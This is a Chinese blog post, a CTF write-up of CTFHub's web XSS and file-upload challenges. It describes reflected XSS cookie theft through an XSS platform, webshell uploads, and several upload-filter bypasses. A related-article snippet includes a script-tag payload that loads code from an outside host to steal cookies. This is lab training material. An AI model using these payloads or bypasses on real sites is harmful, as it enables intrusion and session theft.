题解记录-CTFHub技能树|Web|XSS,文件上传

最新推荐文章于 2024-05-15 22:52:56 发布
最新推荐文章于 2024-05-15 22:52:56 发布
阅读量777 收藏 3
点赞数 2
分类专栏: CTFHub技能树 文章标签: xss web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57448435/article/details/126863911
版权

CTFHub技能树-Web-XSS,文件上传

文章目录

前言

在这里插入图片描述在这里插入图片描述

XSS

一、反射型

在这里插入图片描述 Send 即诱使别人点击我们留下的链接,然后在xss.pt接受返回的信息。
我们复制在xss平台构造好的恶意xss链接,让bot访问,从而在项目信息获得到bot的信息,即得到flag
在xss平台创建xss项目
在这里插入图片描述
将项目生成的代码复制到name

在这里插入图片描述
send后在项目内容里找到flag

在这里插入图片描述

文件上传

一、无验证

在这里插入图片描述无验证,直接上传一句话木马文件
在这里插入图片描述在这里插入图片描述
然后用蚁剑连接

在这里插入图片描述
url后加/upload/文件名,连接密码就是一句话木马里的字符
找到flag

在这里插入图片描述

二、前端验证

在这里插入图片描述bp抓包后发现,只接受.jpg,.png,.gif文件

在这里插入图片描述
将之前的php后缀名改为.png文件上传

在这里插入图片描述

在bp里将文件后缀名改回.php,forward,文件成功上传

在这里插入图片描述
用蚁剑连接,找到flag

在这里插入图片描述

三、.htaccess

题注:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
本题中,主要是利用.htaccess文件能将.png文件解析为.php文件
先上传一个.htaccess文件,意义是将.png解析为.php文件
在这里插入图片描述
然后上传之前的.png木马文件

在这里插入图片描述用蚁剑连接后,找到flag
在这里插入图片描述

四、MIME绕过

先上传.png文件

在这里插入图片描述
在bp中进行修改

在这里插入图片描述
forward后用蚁剑连接,找到flag

在这里插入图片描述

五、00截断

题注:了解一下 PHP 5.2 00截断上传的原理

在url中%00表示ascll码中的0 ,表示字符串结束,所以当url中出现%00时就会认为读取已结束。
利用此特点来用%00上传文件

先上传.png文件,然后用bp抓包进行修改
在这里插入图片描述
forward后用蚁剑连接,找到flag

在这里插入图片描述

六、双写后缀

本题会过滤一个php
于是上传一个.php文件,然后在bp里修改后缀为双写.pphphp,这样在过滤了一个php后,仍有一个php存在
在这里插入图片描述
forward上传成功,用蚁剑连接,找到flag

在这里插入图片描述

七、文件头检查

本题在上传时对文件进行了分析,检查了文件头,先上传一个正常的.png文件,然后在bp中删去部分后面内容,改为一句话木马,将文件后缀改成.php
在这里插入图片描述
forward上传成功后,用蚁剑连接,发现flag

在这里插入图片描述

总结

xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用

TTjsm1
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 5237
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
CTFHub XSS DOM跳转 WriteUp
柠檬i的博客
07-05 2083
跳转 XSS 的攻击方式涉及将恶意脚本嵌入到跳转链接或重定向 URL 中,以便在用户点击该链接或重定向时触发脚本的执行。攻击者可以利用跳转 XSS 攻击来进行会话劫持、盗取用户信息、篡改页面内容等恶意活动。 为了防止跳转 XSS 攻击,开发人员应该对用户输入的数据进行适当的验证、过滤和转义,以确保在将其嵌入到页面中之前进行正确的处理。此外,安全的编程实践和使用安全的开发框架也是防止跳转 XSS 的关键。
CTFhubxss漏洞
最新发布
weixin_46954909的博客
05-15 674
前期了解:上半部分是用户执行的操作,下半部分是模拟服务器的操作。
CTFHUB------XSS
qq_45616570的博客
06-23 725
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top: categories: CTFHUB刷题 tags: 网络安全 CTFHUB CTFHUB------XSS 反射型xss 题目 解题思路 题目是xss反射型 xss反射型是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 解题过程 1.创建xss平台项目 2.点击下一步,勾选默认模块 3.点击下图中的一个作为反射型的变量值 4.返回题.
CTFHub | web——xss(存储型)
2301_76435948的博客
09-28 583
提交后无任何变化提交后:将本页url粘贴到第二个框中:得到flag。
CTFHub——XSS
2302_79119987的博客
03-28 913
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
web-ctf-writeups
05-10
web-ctf-writeups web狗爬坑中的学习的writeup整合。 如果有师傅认为侵权,请联系我删除。另欢迎各位师傅投递链接。该repo会不断更新,最近更新日期为:2018/6/26。 N1CTF 大部分题解 777&&777 2&&babysqli Easy&&...
Hacker101-CTF
04-19
黑客101-CTF 解释 HackerOne; 这是一个漏洞平台,可将企业与渗透测试人员和网络安全研究人员联系起来。 此平台上的Hacker101是针对Web安全域的易受攻击的免费类。 受漏洞的启发,该课程使用户可以练习自己的举报...
leetcode题库-Leetcode-Hub:Leetcode题解InJava
06-29
题解 In Java。 在线阅读: 介绍 世界上并没有完美的程序,但我们并不因此而沮丧,因为写程序本来就是一个不断追求完美的过程。 本地开发 & 阅读 本项目基于 vuepress 进行开发,以提供比 github mardown 更佳的阅读...
力扣题解大全-600多页版
08-29
这个“力扣题解大全-600多页版”显然是一个全面整理了力扣平台上众多题目的资源,涵盖了从基础到中高级的算法和数据结构的应用。以下是一些关键知识点的概述: 1. **基本算法**:包括二进制操作(如题目1022),...
西普WEB大部分题解
12-09
总的来说,"西普WEB大部分题解"是一个非常宝贵的资源,它涵盖了Web安全的多个层面,包括但不限于SQL注入、XSS跨站脚本、CSRF跨站请求伪造、文件包含漏洞、命令注入等常见Web漏洞。通过深入学习和实践这些题解,不仅...
2023-7-27 ctfhubxss
strider1123的博客
07-27 194
拖了好几天了,今天得赶紧把xss整完 xss:跨站脚本攻击(Cross Site Scripting),为与层叠式样表css区分写为xss xss攻击能够用来盗用cookie,获取敏感信息等 xss攻击大概分为三种:反射型,存储型,DOM型,反射型和存储型也可以叫非持续型和持续型 攻击产生的原理是由于网页在处理用户输入的文本时将<script>等作为html的标签,执行了里面的代码,...
文件上传漏洞-04】文件上传路径截断靶场实战
cc
02-16 5485
在http请求中,我们发现了"save_path",顾名思义就是文件上传的路径,也可以影响文件存储路径,而根据响应的文件路径,可以发现服务器对上传的文件进行了重命名。服务器后台采用的是move_uploaded_file()函数将上传的文件移动到新位置也就是文件另存,函数在执行的时候会有两个参数,第一个参数就是原文件的路径,第二个参数就是目标函数的路径,这两个路径都是作为字符串来出现的;注意:在http请求中,存储路径可控,是可以采用00截断的一个条件,且采用00阶段是为了使上传的文件可执行。
CTFHub技能树web(持续更新)--web前置技能(HTTP协议)--请求方式
jiuyongpinyin的博客
07-26 384
请求方式 进入界面,查看源码,没啥有用的,题目告诉我们现在的请求方式是GET,使用CTF**B的方式,会有flag,首先给大家普及一下,HTTP的请求方式有哪些: 1.GET 2.POST 3.PUT 4.HEAD 5.OPTIONS 6.DELETE 7.TRACE 8.CONNECT 一共八种请求方式,然后按照题目要求,猜测他让我们提交的请求方式是CTFHUB,抓包进行尝试: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 798
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
XSS详解
分享与记录
03-24 781
XSS简介: 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets)的缩写混淆,将跨站脚本攻击的缩写改为XSSXSS是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种,恶意攻击者往web页面里插入恶意script代码,当用户浏览该网页时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。攻击成功之后,恶意...
CTFhub 反射型xss
luminous_you的博客
12-06 1067
查看是否能弹框 尝试弹出自己的cookie发现是空的 XSS平台 第一个输入框 <sCRiPt/SrC=//xs.sb/T391>//可以看到图片中下面那个是我们的,没有cookie 第二个输入框复制url输入,他第二个输入框是将url发送给了机器人(相当于管理员,这样我们就获取到了管理员的cookie)//图片上面那个是机器人的cookie中含有flag http://challenge-6d1eed70035be632.sandbox.ctfhub.com:10080/?name=%
CTF/CTF练习平台-XSSxss注入及js unicode编码及innerHTML】
热门推荐
Sp4rkW的博客
08-31 1万+
原题内容: http://103.238.227.13:10089/ Flag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxx 题目有点坑啊,注入点都没说明,去群里问的,这题注入点为id(get方式),id的值会进行替换后进入s 补充了这个,好了,继续做题 右键源码 &lt;script&gt; var s=""; docu...
反射型XSS绕过案例总结
zaqwescsdn的博客
06-26 1454
1.查看< / "等字符的过滤情况如果没有,直接X。 什么都没过滤的入门情况2.考虑用&#x的形式代替,如果没有过滤& # 理论上可以代替任意字符,但是一般都会将&过滤为&amp。 输出在<script></script>之间的情况//这里构造的代码没懂 输出在HTML属性里的情况3.gbXXXX系列的可以考虑使用宽字符%c0杀掉双引号,可能是因为过滤的正则写的有问题。 宽字节复仇记 [Q
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TTjsm1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值